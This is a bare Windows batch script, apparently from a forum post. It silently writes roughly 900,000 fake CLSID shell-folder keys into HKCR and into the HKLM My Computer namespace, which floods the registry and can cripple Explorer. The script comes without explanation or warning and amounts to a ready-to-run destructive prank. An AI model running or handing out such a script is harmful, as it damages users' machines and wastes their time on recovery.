- @echo off
- for /l %%i in (100000,1,999999) do @Reg add HKCR\clsid\{00000000-0000-0000-0000-000000%%i}\ShellFolder /f /v Attributes /t REG_BINARY /d 00000000>nul&@reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{00000000-0000-0000-0000-000000%%i} /f>nul
复制代码
|